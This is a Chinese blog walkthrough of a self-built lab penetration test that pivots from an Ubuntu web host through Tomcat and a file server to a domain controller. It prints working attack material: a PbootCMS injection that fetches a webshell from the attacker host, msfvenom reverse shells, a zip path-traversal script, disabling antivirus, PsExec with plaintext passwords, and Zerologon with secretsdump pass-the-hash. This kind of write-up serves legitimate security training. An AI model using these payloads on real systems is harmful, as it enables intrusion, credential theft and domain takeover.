Drunkmars's Blog

记一次外网打点到内网渗透

字数统计: 3.5k阅读时长: 15 min
2021/09/13

本文首发于先知社区:https://xz.aliyun.com/t/10293

记一次靶场渗透过程。

环境配置

外网网段:192.168.2.0/24

内网网段:10.10.1.0/24

​ 10.10.10.0/24

ubuntu:192.168.2.189

tomcat:192.168.2.122

​ 10.10.1.129

fileserver:10.10.1.128

​ 10.10.10.140

dc:10.10.10.139

攻击机kali:192.168.2.105

ubuntu

首先对ubuntu进行端口扫描,发现开了21、22、80、888、3306、8888端口

1
nmap -T4 -sC -sV 192.168.2.189 

image-20210913180758054

这里访问一下80端口发现报错没有找到站点,应该是一个宝塔的面板,这里下面给出了解决方法,绑定域名www.cf1.com

image-20210913185005815

这里进入kali的/etc/host目录把192.168.2.189这个ip跟www.cf1.com这个域名绑定

image-20210913185156951

然后再访问一下www.cf1.com即可进入,得到PBOOTCMS的页面

image-20210913185932520

这里再使用kali进行信息搜集,但是没有找到什么有价值的网址

1
dirb http://www.cf1.com

image-20210913190022223

这里通过百度得到PBOOTCMS有一个敏感的目录如下,访问一下得到cms的版本

1
http://www.cf1.com/doc/ChangeLog.txt

image-20210913190121325

这里我使用御剑没有扫除敏感文件,这里我挂代理使用xray扫一下有什么文件暴露没有

1
xray.exe webscan --listen 127.0.0.1:7777 --html-output report.html

image-20210913190417896

得到一个config.tar.gz的文件,看这个后缀名应该是个备份文件

image-20210913190549858

访问一下,把这个备份文件下载下来

image-20210913190614172

得到三个php文件,这里先看一下database.php,返现了数据库用户名跟连接的密码1,还有dbname,这里猜测应该是数据库的文件

image-20210913190724400

百度之后发现PBOOTCMS默认的数据库为SQLite,下载SQLite的专属数据库管理软件DB Browser并赋予权限

image-20210913191052863

然后再访问一下之前找到的db文件,将其下载到本地

image-20210913191430381

在DB Browser里面打开数据库文件可以看到有很多的表

image-20210913191501345

在浏览数据找到ay_user这个表看到有一个admin用户,但是password地方这里是一串字母数字,这里就猜测是md5加密

image-20210913191601192

这里通过md5解密得到密码为admin7788

image-20210913191635030

进入后台admin.php,通过admin/admin7788登录到后台

image-20210913191707726

登录成功

image-20210913191724062

这里通过百度发现有date,in_array,explode,implode这几个函数可用,乍一看是些没啥用的函数, 但还是找到了可以利用的方式,只要将函数名写成数组,经由implode拼接成字符串,最后进入eval即可执行代码。

这里构造一个phpinfo

1
{pboot:if(implode('', ['c','a','l','l','_','u','s','e','r','_','f','u','n','c'])(implode('',['p','h','p','i','n','f','o'])))}!!!{/pboot:if}

image-20210913192309810

然后访问任意网站即可打出phpinfo

image-20210913192327053

那么这里我们可以通过远程加载的方法往本地写入一个shell,首先在本地生成一个一句话木马2.php,执行以下命令远程加载,即可在靶机生成一个test.php文件

1
2
3
4
{pboot:if(implode('',['f','i','l','e','_','p','u'.'t','_c','o','n','t','e','n','t','s'])(implode('',['2','.php']),
implode('',['<?php
file_','put_','contents(','"test.php",','file','_get_','contents("','http://192.168.2.105:8000/2.txt
"))?>'])))}!!!{/pboot:if}

image-20210913193319642

这里我们访问并连接得到webshell

image-20210913193639545

执行命令返回127,应该是disbale禁用了函数,进入phpinfo看一下果不其然,进了一多半的函数

image-20210913193727020

这里是宝塔面板php版本为7.0,这里就先尝试使用上传exp直接绕,链接如下

https://github.com/mmor1/exploits/tree/master/php7-backtrace-bypass

image-20210913193828375

上传exp.php

image-20210913193935046

上传成功,但是这里没地方执行命令,我看了一下他们其他使用这个exp绕的时候都会有一个输入框,但是我这里不知道啥问题没有

image-20210913193953149

反正这个地方卡了半天,然后我在看exp.py的代码的时候发现他的第一行代码是pwn("uname -a"),这不是执行linux代码的地方吗,那么我尝试一下直接执行bash反弹命令可不可以呢

image-20210913194417709

打开7777端口监听然后访问exp.py拿到了反弹shell

image-20210913194433457

首先进行下信息搜集,是ubuntu18.04.4的版本,有个172的ip,有个192的ip,那么应该是一个是docker,一个是本机,我应该拿到的是一个docker的shell

image-20210913194716760

这里/etc/passwd查看下账户,发现一个cf1账户

image-20210913194729409

进入/home/cf1目录发现rsa

image-20210913194808680

id_rsa拷贝出来,加权执行

image-20210913195212590

得到ssh连接

image-20210913195221238

但是这里还是个user权限,尝试先提权,使用docker提权

1
2
3
4
docker run -v /etc:/mnt -it alpine

cd /mnt
cat shadow

image-20210913195401617

image-20210913195409858

这里看了一下cf1这个账号密码应该是破解不出来,那我就尝试创建一个账户test

1
openssl passwd -1 --salt test

因为是个docker,没有openssl环境,而且curl、apt-get、sudo install全部都用不了,没办法这里就用不了docker提权了

image-20210913201034958

这里换个方法,使用到CVE-2021-3156提权,链接如下:https://github.com/worawit/CVE-2021-3156,使用本地起一个http服务,将exp放在目录下,然后执行命令

1
2
wget http://192.168.2.161:8000/exp.py
ls

image-20210913202006658

切换到root用户即可,在/root目录下拿到第一个flag

image-20210913202037037

这里拿到的是一个交互型的shell,先生成一个msf的木马上线msf比较方便

1
msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.2.105 LPORT=4444 -f elf > shell.elf

image-20210913202324200

msf开启监听,然后把木马上传到靶机执行chmod 777 shell.elf加权,执行elf即可得到反弹的meterpreter

image-20210913202717310

这里再在靶机得到的交互型shell里面执行sudo apt-get install nmap安装nmap

image-20210913203112542

然后执行nmap -sn 192.168.2.0/24 -T4对192.168.2.0这个网段进行扫描,得到tomcat的ip为192.168.2.122

ps:这里因为我web和ubuntu设置的桥接,其他几个ip是我室友的电脑或者手机的ip

image-20210913203207810

然后使用nmap继续对122这台主机进行端口扫描得到3306和8080端口,结合tomcat应该判断8080为一个tomcat

1
nmap -T4 -sC -sV 192.168.2.122

image-20210913203405078

tomcat

访问下8080端口是一个jspxcms

image-20210913203455182

这里通过百度发现jspxcms的后台地址为/cmscp/index.do,访问一下得到后台

image-20210913203740711

尝试下弱口令admin/123456

image-20210913203748089

登陆成功

image-20210913203758841

这里百度过后发现jspxcms有一个后台解压,后台可以上传zip文件,上传后会自动解压,问题出现在WebFileUploadsController.java里的unzip方法,调用了下层方法却没有进行文件名检查,导致目录穿透。上传的文件默认会在tomcat目录\webapps\ROOT\uploads\1\下,但构造压缩包可以使上传的文件穿到\webapps下,不会受JspDispatcherFilter的约束

image-20210913203916582

将web.xml放到WEB-INF文件夹下

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
# web.xml
<?xml version="1.0" encoding="ISO-8859-1" ?>

<web-app xmlns="http://java.sun.com/xml/ns/j2ee"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:schemaLocation="http://java.sun.com/xml/ns/j2ee
http://java.sun.com/xml/ns/j2ee/web-app_2_4.xsd"
version="2.4">

<display-name>Main</display-name>
<description>
Shell
</description>

<servlet>
<servlet-name>shell</servlet-name>
<jsp-file>/shell.jsp</jsp-file>
</servlet>

<servlet-mapping>
<servlet-name>shell</servlet-name>
<url-pattern>/shell</url-pattern>
</servlet-mapping>

</web-app>

image-20210913204041399

然后使用jar -cvf shell.war *将目录下的文件打包为shell.war

image-20210913204138861

然后使用test.py生成test.zip

1
2
3
4
5
6
7
8
9
10
11
12
import zipfile

if __name__ == "__main__":
try:
zipFile = zipfile.ZipFile("test.zip", "w", zipfile.ZIP_DEFLATED)

binary = b'<script>alert("helloworld")</script>'
zipFile.writestr("../../test.html", binary)
zipFile.write("shell.war" ,"../../../shell.war")
zipFile.close()
except IOError as e:
raise e

image-20210913204343529

执行即可得到test.zip

image-20210913204354466

这里我直接使用windows/meterpreter/reverse_tcp生成的木马被360给拦截了,查阅资料后发现使用java/jsp_shell_reverse_tcp载荷即可绕过

image-20210913204646507

点击上传文件并用ZIP解压

image-20210913210329108

访问http://192.168.2.122:8080/shell/shell.jsp即可得到反弹的meterpreter

image-20210913211424147

进行信息搜集可以发现一个10.10.1.0/24段,一个192.168.2.122

image-20210913211449118

这里msf上不好执行windows命令这里我派生给cs一个会话,首先新建一个监听

image-20210913212329540

然后在msf里面执行

1
2
3
4
5
use exploit/windows/local/payload_inject
set lhost 192.168.2.161
set lport 5555
set sessions 4
run

image-20210913212541660

image-20210913212558209

运行即可在cs里面上线

image-20210913212703217

这里sleep 1后执行hashdump得到Administrator的密码

image-20210913212707764

然后对10.10.1.0/24段进行扫描得到另一个存活的ip:10.10.1.128

image-20210913212917466

回到msf添加路由并配置socks代理,这里我用4a比较习惯,也可以用5,并配置/etc/proxychains.conf文件

1
2
3
4
5
6
route add 10.10.1.0 255.255.255.0 4
route print

use auxiliary/server/socks_proxy
set version 4a
run

image-20210913213258010

然后使用proxychains配合nmap进行端口扫描,只能访问到445端口

1
proxychains nmap -sT -Pn 10.10.1.128 -p 445,80,139,3306

image-20210913213445706

image-20210913213537829

445端口联想到ipc,直接使用一个空连接尝试访问FILESERVER成功

image-20210913213712806

把之前抓到的hash解密一下得到administrator的密码为QWEasd123

image-20210913213834515

那么这里我直接尝试上远程桌面进行信息搜集,这里首先打开远程桌面

1
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f

image-20210913213915274

在本地配置proxychain为192.168.2.105/1080端口代理进内网,然后使用administrator/QWEasd123进行登录

image-20210913214724949

得到第二个flag

image-20210913223646635

fileserver

之前在信息搜集的过程中就已经发现主机中存在360套餐,为了方便下一层的渗透这里把360关掉会比较方便

image-20210913214805290

但是放大之后这里360图标不见了

image-20210913214827441

那先把windows defender关掉

image-20210913214841061

关不掉360那我就直接粗暴的卸载了

image-20210913215204921

image-20210913215304936

还有一个360杀毒也要卸载掉

image-20210913215328396

这里拿到了administrator的账号密码尝试使用ipc连接成功

image-20210913220156626

使用administrator的hash进行psexec,没有横向成功

image-20210913220845699

这里继续往下走有两种方法,首先是上线msf的方法

当我们打到这个地方的时候已经经过了两层网络,从192.168.2.0段到了10.10.1.0段,所以这时候如果我们生成个木马反弹到msf,msf是接收不到的,所以这时候我们就需要进行流量转发,把我们拿到的这台10.10.1.129主机当作跳板,把所有经过这台主机的流量全部转到kali上面去

1
2
3
shell netsh interface portproxy add v4tov4 listenport=7788 connectaddress=192.168.2.105 connectport=7788 //添加ipsec入站规则

shell netsh interface portproxy show all //查看规则

这里可以看到已经添加成功,这里就相当于所有经过10.10.1.129的7788端口的流量都会被转发到192.168.2.105(kali ip)的7788端口处

image-20210913221045097

那么我们用msf生成一个木马,lhost直接设置为10.10.1.129,但是流量还是会直接转到msf上

1
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.1.129 LPORT=7788 -f exe > abc.exe 

image-20210915200103718

把木马拷贝到128这台主机上

1
shell copy C:\Users\Administrator\Desktop\test.exe \\10.10.1.128\c$\windows\temp\test.exe

image-20210913221404201

尝试了下at,sc计划上线都失败

image-20210913221451175

那么这里我们有管理员的帐号跟密码,我们就可以使用到psexec的exe直接执行命令

1
PsExec.exe \\10.10.1.128 -u administrator -p QWEasd123 -i c:\\windows\\Administrator\\Desktop\\abc.exe

image-20210915200205708

kali监听7788端口即可收到反弹的meterpreter

image-20210915200244911

这里懒得开远程桌面上去找了,根据之前flag的位置使用psexec获取一个cmd环境顺利得到第三个flag

image-20210913224237896

image-20210913224249894

拿到第三个flag后继续进行信息搜集,可以看到也有两个网段,分别为10.10.10.0/2410.10.1.0/24

image-20210915200516952

进入cmd环境下,首先用chcp 65001设置下否则会乱码,然后ipconfig /all可以看到dns为fbi.gov,那么这台主机就处于fbi.gov这个域里面

image-20210915200635122

抓下密码,hashdump这里没有执行成功不知道是什么原因,是system权限,有点迷,换了个run post/windows/gather/smart_hashdump命令抓取到了administrator的hash

image-20210915201108530

解密一下也是QWEasd123

image-20210915201159160

另外一种方法上线cs的话,首先创建一个监听中转

image-20210915201319029

image-20210915201330308

然后生成一个木马

image-20210915201356006

image-20210915201418077

这里把木马拷贝到128主机上,这里可以建立ipc连接后copy即可

image-20210915201935378

执行即可上线cs

image-20210915201948819

dc

继续对10.10.10.0/24段的主机进行信息搜集,前两个命令都报错

1
2
3
shell net view
shell net view domain
shell net user

image-20210915203113915

然后使用cs对10.10.10.0/24网段主机进行扫描,得到另一个存活的ip:10.10.10.139

image-20210915203311474

回到msf添加10.10.10.0段的路由

image-20210915203416613

使用proxychain配合nmap扫描些常见的端口,这里可能是几层网络的原因扫起来太慢了我就没扫完

1
proxychains nmap -sT -Pn 10.10.10.139 -p 80,88,89,8000,9090,1433,1521,3306,5432,445,135,443,873,5984,6379,7001,7002,9200,9300,12111,27017,27018,50000,50070,50030,21,22,23,2601,3389 --open

image-20210915204318450

看了下cs扫出的端口88、389端口基本确定为DC

image-20210915204326656

尝试了永恒之蓝、弱密码、pth等一系列方法都没成功,这里就不放图了,然后使用到cve-2020-1472,首先检测一下存在漏洞

1
proxychains python3 zerologon_tester.py dc$ 10.10.10.139 

image-20210915205203043

然后使用cve-2020-1472-exploit.py将dc密码置空

1
proxychains python3 cve-2020-1472-exploit.py dc$ 10.10.10.139

image-20210915205027366

再使用impacket/examples里面的secrertsdump.py获取密码

image-20210915205423396

可以使用这个命令

1
proxychains python3 secretsdump.py fbi/dc\$@10.10.10.139 -just-dc -hashes :

image-20210915210318992

这个命令也可以获取到

1
proxychains4 python3 secretsdump.py fbi/dc\$@10.10.10.139 -no-pass  

image-20210915210856591

还是使用到impacket里面的smbexec.py直接获取dc的cmd环境

1
proxychains python3 smbexec.py -hashes aad3b435b51404eeaad3b435b51404ee:669a3273144a82b942377c1001ed03a3 administrator@10.10.10.139

image-20210915210649254

这里还是之前存放flag的目录得到root.txt,得到最后一个flag

image-20210915210708052

这里设置了chcp 65001前面那串还是乱码,好奇心驱使我看了下,原来是说已经打通了域控,本次渗透至此结束

image-20210915221308793

CATALOG
  1. 1. 环境配置
  2. 2. ubuntu
  3. 3. tomcat
  4. 4. fileserver
  5. 5. dc